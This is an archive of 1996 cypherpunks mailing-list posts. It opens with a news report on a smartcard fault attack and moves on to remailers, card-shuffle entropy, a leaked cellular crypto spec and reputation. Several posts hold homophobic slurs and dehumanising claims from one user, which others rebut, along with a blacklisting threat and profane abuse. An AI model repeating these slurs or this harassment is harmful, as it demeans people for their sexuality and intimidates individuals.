Dr Ross Anderson, of Cambridge University Computer Laboratory, working
with German researcher Markus Kuhn, used methods pioneered by Sky-TV
hackers to crack the Dallas chip, described by the manufacturer as
having "the most sophisticated security features available in any
microcontroller" and used in most of Britain's cash machines.

The chip decodes the information read from bankcards and authorises the
bank machine to process transactions ordered by the owner. It is also
used by the Mondex system to verify the amount of electronic money
available to the cardholder.

Anderson and Kuhn used cheap and easily built electronic equipment to
send wrong instructions to the chip, observing how it encrypted bad
data. By sending such errors through all parts of the encryption system,
they could work out its key.

"You will have to have backup security"

"Once you know that, you can instruct it to put some zeros on the end of
your Mondex balance, start unscrambling your satellite feed, anything
you like," Anderson said. "Breaking the average smartcard can be done by
anyone with a modicum of technical knowledge by the methods we have
described. The expense is negligible but it is time-consuming."

Their discovery could spell the end of the Mondex system, which relies
entirely on the security of the smartcards for its integrity. "I don't
think you will be able to have floating systems like Mondex any more,
where all the information is held on the smartcards," said Anderson.

"You will have to have backup security with authorisation calls and
auditing, just like ordinary credit cards. The smartcards are no longer
reliable on their own."

John Beric, head of security at Mondex, said security was a moving
target, and he was unconcerned by the findings. "I welcome Dr Anderson's
work, because it's a benchmark that establishes the difficulty of
breaking the system," he said. "I take some comfort that it's taken a
Cambridge academic and a very bright student to do this."

Beric said Mondex had a scheme for continually improving its security by
transparently introducing new smartcard chips every two years. "It's not
static, we're ahead of the criminal now, and we believe the technology
is there to ensure that we stay ahead."

Anderson said his latest research indicated that two of the world's most
widely used systems for encoding sensitive financial information - the
RSA and DES encryption standards used by most banks - could also be
cracked easily."

[The London Telegraph, 19th November 1996]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 19 Nov 1996 12:38:48 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: The Utility of Privacy
In-Reply-To: <3.0b36.32.19961118232424.00b845f8@panix.com>
Message-ID: <Pine.SUN.3.94.961119153435.13259A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996, Duncan Frissell wrote:

> Date: Tue, 19 Nov 1996 06:31:07 -0500
> From: Duncan Frissell <frissell@panix.com>
> To: Black Unicorn <unicorn@schloss.li>, Sandy Sandfort <sandfort@crl.com>
> Cc: Huge Cajones Remailer <nobody@huge.cajones.com>, cypherpunks@toad.com
> Subject: Re: The Utility of Privacy
> 
> At 06:54 PM 11/18/96 -0500, Black Unicorn wrote:
> >> Not long ago, a college education was essentially a death warrant 
> >> in Cambodia.  Prior to that, a degree was considered a good thing
> >> there.  People saw no reason to hid the fact that they had been
> >> in school.  Trouble is, things changed.
> >
> >Oh, come on.  That could never happen here.
> 
> Where have I heard that line before?  Sandy was giving an actual example of
> a general problem.  Educated people were executed in Cambodia.  That may
> not happen here but it is very common for innocent legal activities or
> characteristics to later become very illegal and subject to punishment.

sar'casm n. [LL sarcasmos < Gr sarkasmos < sarkazein, to tear flesh like
dogs, speak bitterly] 1. a taunting, sneering, cutting or caustic remark;
gife or jeer, generally ironic.


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 19 Nov 1996 12:42:51 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: BAD FAGGOT John Gilmore
In-Reply-To: <Pine.LNX.3.95.961119052314.18903A-100000@dhp.com>
Message-ID: <Pine.SUN.3.94.961119154027.13259B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




Wow, I couldn't have made a stronger case for this individual's lack of
substance in 1 hour of open debate.

On Tue, 19 Nov 1996, aga wrote:

> Date: Tue, 19 Nov 1996 05:32:18 -0500 (EST)
> From: aga <aga@dhp.com>
> To: freedom-knights@jetcafe.org
> Cc: InterNet Freedom Council <ifc@pgh.org>, paul@fatmans.demon.co.uk,
>     cypherpunks@toad.com
> Subject: BAD FAGGOT John Gilmore
> Newsgroups: alt.god.grubor,soc.men,alt.cyberspace,alt.wired,soc.culture.usa,alt.internet.media-coverage,alt.asshole.john-gilmore,comp.admin.policy
> 
> On Tue, 19 Nov 1996, Black Unicorn wrote:
> 
> > Date: Tue, 19 Nov 1996 05:11:23 -0500 (EST)
> > From: Black Unicorn <unicorn@schloss.li>
> > Reply-To: freedom-knights@jetcafe.org
> > To: aga <aga@dhp.com>
> > Cc: paul@fatmans.demon.co.uk, freedom-knights@jetcafe.org,
> >     cypherpunks@toad.com
> > Subject: Re: NO commo to "Faggot" cypherpunk list
> > 
> > On Mon, 18 Nov 1996, aga wrote:
> > 
> > > As I said dude; I no longer respond to any como with the cypherpunks
> > > address in the header.  If you want an answer to your comments,
> > > address your reply to the Freedom-knights list or to me, without
> > > any *punks address in the header.
> > > 
> > > Any list run by an admitted Faggot is no place where I
> > > will allow an audience.
> > 
> > Oh, this guy is for free speech.  Sure.
> > 
> 
> Hey motherfucker, I TOLD YOU to leave out the stupid
> cypherpunks header!  Just when are you going to learn
> to listen?!!  You have been around those faggots too much!
> 
> Faggots have NOTHING to do with Fredom of Speech!
> 
> > Freedom Knights?  Try Knights of the KKK.
> > 
> 
> Hey cocksucker, the KKK have nothing to do with faggots!
> 
> There is a basic understanding in life by ALL GOOD MEN
> that Faggots are defective creatures.  NOBODY wants to
> be seen with or associated with faggots!
> 
> John Gilmore is a Faggot, therefore he is defective.
> And we question any of his associates.
> open and shut case.
> 
> -aga
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 19 Nov 1996 12:49:20 -0800 (PST)
To: Stephen Boursy <boursy@earthlink.net>
Subject: Re: NO commo to "Faggot" cypherpunk list
In-Reply-To: <3291A407.2E94@earthlink.net>
Message-ID: <Pine.SUN.3.94.961119154224.13259D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996, Stephen Boursy wrote:

> Date: Tue, 19 Nov 1996 07:11:51 -0500
> From: Stephen Boursy <boursy@earthlink.net>
> To: freedom-knights@jetcafe.org
> Cc: cypherpunks@toad.com
> Subject: Re: NO commo to "Faggot" cypherpunk list
> 
> George A. Stathis wrote:
> > 
> > Black Unicorn wrote:
> >
> >>> Any list run by an admitted Faggot is no place 
> >>> where I will allow an audience.
> 
>   That certainly is your right alough I'd personally
> differ.


Watch it.  I didn't write the above.

> 
> >>
> >>Oh, this guy is for free speech.  Sure.
> 
>   I saw nothing to the contrary--did you?

Free speech, except for some undesireables, who are defective because I
say so.  I'd call that contrary.

> 
> >>Freedom Knights?  Try Knights of the KKK.
> 
>   Oh my.
>  
> > I think you ought to realize by now, Mr. "Black Unicorn", that
> > aga (like everyone of us) has a right to his own likes and dislikes.
> > They may alienate some people, offend others, but I sincerily believe
> > that equating his "dislike of faggots" to the "KKK" is seriously
> > misleading.

Hate is hate.  Period.  Listen to the KKK sometime.  It's not only the
color of one's skin that attracts their ire.

He can hate whomever he pleases.  When he begins to preach that those
individuals are somehow sub-human, defective, he is advocating anything
but freedom and free speech.  (Unless perhaps you could include in
"freedom" the freedom to put all those of a certain race or sexual
preference on an island somewhere and sink it). 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 19 Nov 1996 12:50:49 -0800 (PST)
To: trei@process.com
Subject: Re: [NOISE] U.S. CIA employee caught spying
In-Reply-To: <199611191440.GAA14684@toad.com>
Message-ID: <Pine.SUN.3.94.961119154849.13259E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996 trei@process.com wrote:

> Date: Tue, 19 Nov 1996 09:42:01 +0000
> From: trei@process.com
> To: cypherpunks@toad.com
> Cc: trei@toad.com
> Subject: Re: [NOISE] U.S. CIA employee caught spying
> 
>  Tim Scanlon <tfs@adsl-122.cais.com> writes:
> > This is on the local DC news;
> > Harold Nicholson age 46, a CIA employee was arrested for spying today
> > at Dulles airport. He allegedly has been working for the Russians
> > for the past 2 years. 
> > He was caught after he failed a series of polys, and bank account 
> > irregularities had been noticed, as well as suspcious travel.
> > They got him on hidden video apperently photocopying documents
> > that he intended to pass along.
> > Tim
> 
> If he's found guilty, I hope that they throw the book at the traitor. He
> apparently  was a trainer of agents, and as such was in a positiona to 
> identify many to the Russians. I wonder how many died so he could 
> earn his $140,000? 

It seems clear that none died.

He had access (but its unclear if he turned over) a list of every agent
trained in the last two years.

> 
> Peter Trei
> trei@porcess.com
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 19 Nov 1996 16:17:32 -0800 (PST)
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Playing Cards - Caution!
Message-ID: <v02140b01aeb7f62047d8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 AM 11/19/1996, Alan Bostick wrote:
> Thirty-two bits of randomness in a space that is 225 bits wide leave
> room for an awful lot of order.

The maximum entropy after one riffle shuffle is actually about
48 bits, assuming the deck was split in half.  That is, n! / k! (n-k)! =
52! / 2 * 26! ~= 4.9592 * 10^14.  log_2 4.9592 * 10^14 = 48 bits.
(Think of one half of the deck of k cards fitting into n possible
holes.  The order of each half of the deck is guaranteed, so this
can be thought of as the number of ways k balls fit into n holes.
What about the other half of the deck?  They just fall into the
empty holes.)

Assume the split introduces about 4 more bits, and we get 52 bits
of possible shuffles.  However, in practice a riffle shuffle may be
more predictable.

It is possible that 32 bits of entropy are introduced with each riffle
shuffle, but it is not obviously true.  For a cryptographic application,
the standard is higher than for almost any other.  So, if it is not
clear that something is the case, probably it shouldn't be used.

>> A model is presented which Diaconis believes is similar to how people
>> shuffle in real life.  What is troubling from a cryptographic point of
>> view is that there is little empirical evidence to back this up.  What
>> is more, Diaconis mentions that there is some variation in shufflers.
>> A neat shuffler will be less random.  (Side note: The Economist claims
>> Diaconis can execute 8 perfect shuffles in less than a minute.  This
>> means the deck is returned to its original order!)

> Mathematics does not rely on empirical evidence. ;-)

That's true, but the application of mathematics certainly does
depend on empirical evidence.  I would be very surprised if Diaconis
made a mistake with the math.  I think the math is what primarily
interests him.  From his book I did not see a lot of evidence that
a great deal of empirical research on card shuffling had been performed.
Rather, a few mathematicians here and there appear to have tried out
the model and decided that it more or less works.  For the standards
we should apply, those of a cryptographic application, this is not
good enough.

>> The study of randomness in cards looks much harder to me now.  Also,
>> flaws which may be exploitable for financial reasons when real money
>> is on the table may have to be substantially more dramatic than the
>> flaws required to exploit, for instance, an alleged one-time pad.

> Do bear in mind that, unless you distill its entropy through hashing,
> a randomly-ordered deck of cards is going to show a lot of seemingly
> non-random properties if you try to use it as a one-time pad.  Most
> obviously, because each card in the deck is dealt once and only once,
> there must of necessity be correlations between cards dealt early in
> the deck and cards dealt later.  (Card-counters at blackjack tables
> make their money by exploiting these correlations.)

I solved this problem in my original message on the subject.  You use
the order of the cards to represent your message.  Then you use a
fully shuffled deck to mix up the mapping of the cards to numbers.  If
the deck is truly randomly ordered, the scheme I proposed is a true
one time pad.  (If I made an error, I would like to hear about it!)

Tangentially, I would be reluctant to rely on a one time pad whose
key was produced by a hash function.  We assume that the hash function
is cryptographically secure, but if we can assume that, we might as
well assume that some cryptosystem is secure.  One time pads are supposed
to avoid those types of assumptions.

> The randomness of rolling dice is much more easy to interpret than that
> of dealt cards.

I agree completely.  In practice, you pretty much have to have a
computer to make use of the original schemes I proposed.

The literature on card shuffling is quite interesting.  A number of people
over many years have worked on this.  It looks to me like there's lots
more interesting work to be done.  Many readers of this list would
probably find Diaconis's book interesting.

There might even be a number of new attacks possible on card games.
If 7 riffle shuffles does not, in fact, bring the deck to complete
entropy it means that a number of combinations of cards are unlikely.
Is the distribution of pokers hands perfectly even?  They may not
be.  Solving this problem in the general case appears to be very
hard.  But, some progress could be made by modeling real shuffling
and looking for patterns in the relationships between the cards
electronically.  Conceivably, poker hands are not as random as people
believe.  While the cards you have in your hand may be random, their
relationship to other cards may not.

This is like a pseudo random number generator.  If you don't notice
the pattern, you will believe you are looking at a random number
stream, but in fact you are not.

However, the entire subject is orthogonal to my goals right now.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 19 Nov 1996 13:21:13 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: The Utility of Privacy
Message-ID: <9611192120.AA04926@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Nov 96 at 6:31, Duncan Frissell wrote:


> Owning gold in America in 1930 vs 1933

Hi Duncan.

Do you have any documentation or historical references to the reason they gave 
for forbidding ownership of gold?  Just curious...

How about gold backed Magic Money tokens?  :)

Ciao

jfa
Jean-Francois Avon, Pierrefonds (Montreal) QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultants
    physicists and engineers, LabView programing
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D : 152ACCBCD4A481B0 254011193237822C 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 19 Nov 1996 15:08:41 -0800 (PST)
To: jya@pipeline.com (John Young)
Subject: Re: CAVE Query
In-Reply-To: <1.5.4.32.19961119163629.006c216c@pop.pipeline.com>
Message-ID: <199611192220.QAA03605@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


how about posting it to anonymously to the USENET and providing a link
from your page to DejaNews explaining how to do a filter query.

igor

John Young wrote:
> 
> We've received by black bag a 25-page doc entitled:
> 
>      TR45.3, Appendix A to IS-54,  Rev. B
> 
>      Dual-Mode Cellular System
> 
>      Authentication, Message Encryption, Voice Mask
>      Generation, A-Key Verification, and Test Data
> 
>      February, 1992. No Source.
> 
> It describes the CAVE cryptographic function in detail,
> and its use to generate a set of cryptovariables for the 
> Cellular Message Encryption Algorithm (CMEA); for 
> generation of 520 bits for the duplex voice privacy masks; 
> and for other tasks.
> 
> Each page warns that information in the document may be
> subject to export jurisdiction under ITAR.
> 
> Does anyone know if this is already available on the
> Web?
> 
> TIA of incarceration.
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johannes Kroeger <jkroeger@squirrel.owl.de>
Date: Tue, 19 Nov 1996 08:57:21 -0800 (PST)
To: mail2news@anon.lcs.mit.edu
Subject: Squirrel Type-1 remailer is up again in PGP-only mode
In-Reply-To: <19961118140419.21236.qmail@squirrel.owl.de>
Message-ID: <19961119163809.9055.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello remailer users!

I've solved the mail traffic problem with my provider and put
the type-1 remailer at squirrel back up.  But it will only remail
PGP-encrypted messages to reduce the convenience to spammers.

Accepting only encrypted mail should also enhance the security since
it is harder for attackers to identify which encrypted incoming mail
corresponds to which outgoing mail.

Raph, please put the Squirrel remailer

$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek"

on your list again and point out that it only accepts PGP messages.  Thanks.


If someone removed the PGP-key from their keyring,
here is it again (you can find it on the key servers too):

Type Bits/KeyID    Date       User ID
pub  1024/0B11B275 1996/08/08 Squirrel Remailer <mix@squirrel.owl.de>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjIJ8IkAAAEEAJvmQTdUL2iLpKmZcnrtQuQWdw1zqt7oYVqkWeFa8J0qrunP
smKvfTXmo52y2leLxbKZ6efADvrKq9ThXGF6qREVIdzTOnRYsVIwSSJjqBiDykAU
cz8y/rEDes0oty4TRhysve976RwF3dLK7WU0RrDFj3VBLMhzyiQ+wVoLEbJ1AAUR
tCdTcXVpcnJlbCBSZW1haWxlciA8bWl4QHNxdWlycmVsLm93bC5kZT6JARUCBRAy
DQ4gvA9InihC/mkBAUlnCACgdpUBabYF9mQPaBC69YGxvcmoYQUxtqj7HlSpAAMr
l0HlPNVUHuSqgo3Wo54uIHc4fFA2JYyxi/qETrQU5sHGOHq63H66uPylyzTLfE5v
uIzbMuikNL2f9SIpdPamW2b+4Jep8UNlSGN0hKtbyedBDClJfPYbCXn9FKgwFcoo
UyPTcfiAsV1f97cTGFM88thUVv6pAYNO4quangxnBEtdwY/mrr1xefw36TiC1yPo
PNItxHEFRFxD2aEG5vA5hjRp/Sz5ZXZiY8K9X7hlt+n3MUXfKKz/OldWtF+Q9fOg
a8Kmqj+duqlS2A4NbWp9emujOEzn2giI7+13B8MEyzVliQCVAgUQMgnwiSQ+wVoL
EbJ1AQFKYwP/XqOGRvvjyd3anh42iAG0SASP9e/fIjD8bCymdEhJHdAsNy0H06ns
oaLtH20tHN4BAgUo9i9H8h11+AygF4iJokGz1coP2BJI/O2o7YxR8SBWwk1SSrCb
utbsi00uz/7QN1zb7Gn/sowUahhBsmhbJbkuur6EB5shBqyq0m/5jVE=
=MqM9
-----END PGP PUBLIC KEY BLOCK-----


I apologize for the lost mails during the shutdown.


Regards,
Johannes

-- 
Johannes Kroeger		<jkroeger@squirrel.owl.de>
Send me mail with subject "send pgp-key" to get my PGP key

P.S.:

The type-1 remailer runs under the control of Mixmaster,
and the PGP-only mode is enforced by the following patch
to the Mixmaster source file Mix/Src/main.c:

--- main.c.orig	Sun Oct 27 01:36:46 1996
+++ main.c	Tue Nov 19 15:53:06 1996
@@ -362,12 +362,15 @@
 not a remailer message */
           type=0;
-        } else { /* It is a remailer */
+        } else { /* It is a remailer message */
           fgets(line,255,fptr);
-          if(strstr(line,"Remailer-Type:")==NULL) { /* All Type 2 messages
-start with this so if it is not...*/
-            type =1;
-          } else {
+          if(strstr(line,"Remailer-Type:")==line) { /* All Type 2 messages
+start with this... */
             type =2;
-          }
+          } else
+          if(strstr(line,"Encrypted: PGP")==line) { /* All Type 1 messages
+start with this... */
+            type =1;
+          } else
+            type =0; /* Plaintext messages are not remailed */
         }
         fclose(fptr);




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 19 Nov 1996 14:43:48 -0800 (PST)
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Reputation distortions?
In-Reply-To: <v0300780faeb77279ea48@[206.119.69.46]>
Message-ID: <199611192300.RAA01464@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 6:05 am -0500 11/19/96, snow wrote:
> >     Reputation could also eleminate the need for judges. If Matt Blaze,
> >or Randall S. were to try to claim a specific bounty, people would be
> >more likely to accept their claim than if I were to do so.
> I'm not saying that Gauss *didn't* discover the normal distribution. I'm
> saying that he didn't have to *prove* he did. Of course not. He was the
> greatest mathematician of his time, and probably since.
> I'd call the event a reputation distortion.

      With either system proposed (market based contracts v.s. bounty) 
you are paid for code. Let's face it, with reputation capital, losses (i.e.
bad moves/actions/whatever) are far more costly than good moves pay. 

     To use a sports analogy: If you fumble the ball, and allow the runner
to score, more people are going to remember it than if you make a couple of
baskets.

     What was the thing that killed Bushes chances of re-election against 
a rather weak canidate? One lie "No new taxes".

     If Gauss had been called on it, what would have happened? If the caller
could _prove_ he was lying, what then? He still would have been the
greatist mathmatician of the time, but he would have been seen as a liar
and a crackpot. We know how that works don't we.  


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 19 Nov 1996 14:22:16 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Cpunks Frog Forwards discontinuation
In-Reply-To: <0N4mXD23w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961119170427.1664A-100000@beast>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Ray Arachelian <sunder@brainlink.com> writes:
> >
> > This has been moved to sunder@sundernet.com (hosted via brainlink, the
> > fascist dorsai account is no more.)
> 
> The search engines show ray@earthweb.com, sunder@brainlink.com,
> arachel@poly.edu, ray.arachelian@f204.n2603.z1.fido.org, sunder@escape.com,
> sunder@dorsai.org, 103070.2610@compuserve.com, sunder@sundernet.com - wow.

Oh, wow, Vulis has learned to use the search engines, I'm impressed!  Not 
all the accounts you list still work, as you might not have figgured it 
out, search engines remember information that's obsolete, so more than 
half of those are long gone.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Tue, 19 Nov 1996 07:14:00 -0800 (PST)
To: Clay Olbon II <cypherpunks@toad.com>
Subject: Re: REQUESTING INFORMATION :-)
Message-ID: <199611191912.RAA05944@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 ðì 19/11/1996 -0500, Clay Olbon II wrote:
9in response to...)
>>to unemployment. We plan to give these names to all our friends, so
>>as to warn them WHO to avoid during our summer holidays in Greek
>>Islands.        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
>Why don't you come back to reality.

Gee! hey, hey, hey... that was a joke!... :-)



>I have hired and fired people.  Those
>that I fired I would not hire again. 

So have I, as a matter of fact. Though I found that people who don't
become friends _and_ business _partners_ as well, tend to be useless
due to the _type_ of we're doing here. We don't need 'workers'; we
need co-developers, responsible partners and co-researchers. We are
in Natural Language Processing (with PROLOG/'C'/Assembly).




>There are others I have worked with
>that I would never hire (and would strongly recommend against anyone else
>hiring).  That is life.  I have little sympathy for the "unfortunate" people
>that I may hurt by not recommending their employment.  Generally it is
>because they are lazy, stupid, or dishonest.
                  ^^^^  ^^^^^^     ^^^^^^^^^
I understand you completely here. I sympathize.



>This is a judgement call on my
>part, and others are free to take or discard my recommendations based on my
>reputation.  

You sound honest and down to earth. I like these qualities very much.


>Here is my recommendation for you.  Take my "unemployables" list.  Hire
>everyone on it.  Try to run a business without going broke.

Does your "unemployment list" include Doctor Dimitri Vulis? I'd be greatful
to know this.
Please, seriously now, and if you have such evidence (that
Dimitri is 'lazy', 'stupid' or 'dishonest') send to me if you can...

Please provide _evidence_ for his 'fame'. I will have NO MORE slander behind
the guy's back. WHAT is going on? I've been harrassed and threatended TOO,
just because of defending him or supporting people's rights to a fair trial?

WHERE do you live, dude? In Nazi Germany? :-(

I have no disagreement with your down-to-earth explanations. But...

Sooner or later your 'sheep-leader' Mr. Gilmore will start blocking access
to MORE geniouses (other than Voulis, who I think _could_ be one) to your
list, and then encryption will be entrusted to morons who can at ANY moment
have their coding systems BROKEN!!!


Perhaps you misunderstood my objections to your practises. FROM the moment
that (for instance) people EVEN like myself receive notices (or threats of)
unemployability (as indeed happened in the letter quoted below) it's an
alarming sign that the _criteria_ for unemployability are no longer your
own decent down-to-earth criteria (honesty, intelligence, trust-worthiness)
but very dark and dubious and QUITE FASCIST criteria instead.

It's only recently that the type of fascist harrassment like "We'll put
you on our U-list", has reached such ABUSE, MISUSE, and ALARMING FREQUENCY.
For some people it's become bread and butter and cheese, apparently...


I would say you are a decent, honest, fearless man trying to do a job which
has a LOT of responsibility, and you may be one among a HUNDRED morons who
by adding NAMES in 'unemployability' lists are no fucking different than
TRAITORS of your country and Nazi Sympathizer in Western Europe.

YOU get back to reality and defend your country from fascism (NOt you
personally, because you had the decency and the honesty to reply), the
OTHERS must get back to reality.

BACK-STABBING and SLANDER (of Dimitri or of anyone) has NOTHING to do
with _serious_ issues of 'unemployability'., FURTHERMORE people are NEVER
guilty before PROVEN so. Guilt or Innocence is NOT a matter of 'opinion',
EITHER of 'mobs' OR of 'leaders', or of would-be psychiatrists roaming
the streets looking for 'juvenile kooks', or other types of labels.

You are, most probably, a real person with very real responsibilites.
In this case, I appreciate you a lot, and hopefully my complaints have
reached the right man's ear.


With Appreciation and Thanks
George A. Stathis
(Software Producer and Developer
 ....'harrassed' -he he- by the following... fascist-scum-letter):

***********************************************************************






>Hops: 0
>Received: from you.got.net (root@scir-gotnet.znet.net [207.167.86.126]) by
prometheus.hol.gr (8.7.5/8.7.3) with ESMTP id UAA27071 for
<hyperlex@hol.gr>; Sun, 17 Nov 1996 20:13:15 -0200 (GMT)
>Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63]) by
you.got.net (8.7.5/8.7.3) with ESMTP id KAA22876 for <hyperlex@hol.gr>; Sun,
17 Nov 1996 10:07:06 -0800
>Posted-Date: Sun, 17 Nov 1996 20:13:15 -0200 (GMT)
>Received-Date: Sun, 17 Nov 1996 20:13:15 -0200 (GMT)
>X-Sender: tcmay@mail.got.net
>Message-Id: <v03007800aeb506f5ac49@[207.167.93.63]>
>In-Reply-To: <199611171100.JAA21839@prometheus.hol.gr>
>Mime-Version: 1.0
>Date: Sun, 17 Nov 1996 10:18:36 -0800
>To: "George A. Stathis" <hyperlex@hol.gr>
>From: "Timothy C. May" <tcmay@got.net>
>Subject: Stathis on "Don't Hire" List
>Content-Type: text/plain; charset="us-ascii"
>Content-Length: 1426
>Status:   
>
>At 9:00 AM -0200 11/17/96, George A. Stathis wrote:
>
>>It is not ethical to send such strong negative _injunctions_ to masses
>>of people and also to strangers (the 1900-strong members of the cyberphunks
>>list for instance). Because, you may or may not have strong reasons for
>>believing you are justified in such invalidation, but more than a 1000
>>people are now _told_ by (self-appointed) "experts" such as yourself what
>>and whom to ignore or to believe. (Like sheep led to the slaughter)...
>
>"Not ethical"?
>
>But we will do it anyway. Moreover, some of us maintain lists of "Do Not
>Hire" persons. Few high tech or Silicon Valley software companies will hire
>such folks.
>
>Congratulations, Stathis, as you are now on such a list.
>
>
>
>"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
>that the National Security Agency would try to twist their technology."
>[NYT, 1996-10-02]
>We got computers, we're tapping phone lines, I know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Swain <dswain@pacificnet.net>
Date: Tue, 19 Nov 1996 18:05:48 -0800 (PST)
To: Johannes Kroeger <jkroeger@squirrel.owl.de>
Subject: Re: Squirrel goes Mixmaster-only
In-Reply-To: <19961118140419.21236.qmail@squirrel.owl.de>
Message-ID: <329266C6.4BE4@pacificnet.net>
MIME-Version: 1.0
Content-Type: text/plain


Johannes Kroeger wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Hello remailer users!
> 
> I'm sorry, but my ISP complained that the huge mail traffic for
> squirrel overloaded their servers.  Effective immediately, my remailer
> accepts only Mixmaster packets and is not listed in Raph's type-1
> statistics anymore.  The operation of the nym server at weasel.owl.de
> is not affected.
> 
> Regards,
> Johannes
> 
> - --
> Johannes Kroeger                <jkroeger@squirrel.owl.de>
> Send me mail with subject "send pgp-key" to get my PGP key
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3ia
> Charset: latin1
> 
> iQEVAgUBMpBs1bwPSJ4oQv5pAQF3Agf/UYmh1P7DM0Wqy9Dzoq/e0jZdvcTDHpNH
> 2MFohAmU1rYn0tKCRW1jUDkG8ULAmfM4HY+aSdKwoihndLL4wTRkhzcl2qePVx6L
> 69ZEs7EpTLpdiFuTAvIvAD8AInqRZY1WgKII9jk7gccU379gl8nxDZtlIyA89jrG
> 795R8QWysQs5zfyQ4VtS2s94ZchFJD+Wp5u6fsVhzklsjxwb43EdVZ4/dPUFo7nO
> azctBYNpWdJBW2Rf81zQDE2OPPs+2kXcvDXU/cg64gtGVGf+8okysEr2fEqdVkFe
> yQsFvpNngaClUSu6xxMIJXiTy3WlbEYXceQE6hUGStq/PkhqKxkqYQ==
> =nAT3
> -----END PGP SIGNATURE-----
go fuck yourself




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Swain <dswain@pacificnet.net>
Date: Tue, 19 Nov 1996 18:07:41 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: How to Unsubscribe, yet again
In-Reply-To: <v03007801aeb65341705f@[207.167.93.63]>
Message-ID: <32926724.409C@pacificnet.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 9:31 AM +0000 11/18/96, Piotr Kunio wrote:
> >unsunscribe
> 
